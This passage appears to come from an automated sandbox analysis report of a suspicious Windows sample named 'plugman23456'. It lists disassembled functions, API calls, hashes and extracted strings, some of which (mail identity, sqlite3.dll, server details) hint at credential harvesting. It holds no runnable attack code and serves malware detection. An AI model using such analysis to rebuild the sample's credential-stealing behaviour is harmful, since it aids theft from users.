                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                          Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: >$>$>
                          • API String ID: 39653677-3911187716
                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                          Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                          Function 0040796E Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                          Download Yara Rule
                          APIs
                          • strlen.MSVCRT ref: 0040797A
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                            • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                            • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                            • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                          • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                          • memcpy.MSVCRT ref: 004079DD
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 1171893557-0
                          • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                          • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                          • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                          • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                          Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi
                          • String ID: C@$mail.identity
                          • API String ID: 1439213657-721921413
                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                          Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00406640
                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                          • memcmp.MSVCRT ref: 00406672
                          • memcpy.MSVCRT ref: 00406695
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset$memcmp
                          • String ID: Ul@
                          • API String ID: 270934217-715280498
                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                          Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                          • sprintf.MSVCRT ref: 0040B929
                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                          • sprintf.MSVCRT ref: 0040B953
                          • _mbscat.MSVCRT ref: 0040B966
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                          • String ID:
                          • API String ID: 203655857-0
                          • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                          • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                          • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                          • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                          Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                          • Opcode Fuzzy Hash: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                          Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                          Strings
                          • recovered %d pages from %s, xrefs: 004188B4
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                          • String ID: recovered %d pages from %s
                          • API String ID: 985450955-1623757624
                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                          Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _ultoasprintf
                          • String ID: %s %s %s
                          • API String ID: 432394123-3850900253
                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                          Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00409919
                          • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: N\@
                          • API String ID: 568519121-3851889168
                          • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                          • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                          • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                          • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                          Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadMenuA.USER32(00000000), ref: 00409078
                          • sprintf.MSVCRT ref: 0040909B
                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                          • String ID: menu_%d
                          • API String ID: 1129539653-2417748251
                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                          Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • failed memory resize %u to %u bytes, xrefs: 00411706
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _msizerealloc
                          • String ID: failed memory resize %u to %u bytes
                          • API String ID: 2713192863-2134078882
                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                          Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                          • strrchr.MSVCRT ref: 00409808
                          • _mbscat.MSVCRT ref: 0040981D
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileModuleName_mbscatstrrchr
                          • String ID: _lng.ini
                          • API String ID: 3334749609-1948609170
                          • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                          • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                          Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          • _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscat$_mbscpystrlen
                          • String ID: sqlite3.dll
                          • API String ID: 1983510840-1155512374
                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                          Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID: A4@$Server Details
                          • API String ID: 1096422788-4071850762
                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                          Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                          • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                          • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                          • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                          Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLocalmemcpymemsetstrlen
                          • String ID:
                          • API String ID: 3110682361-0
                          • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                          • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                          Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                          Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                          • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                          • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                          • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14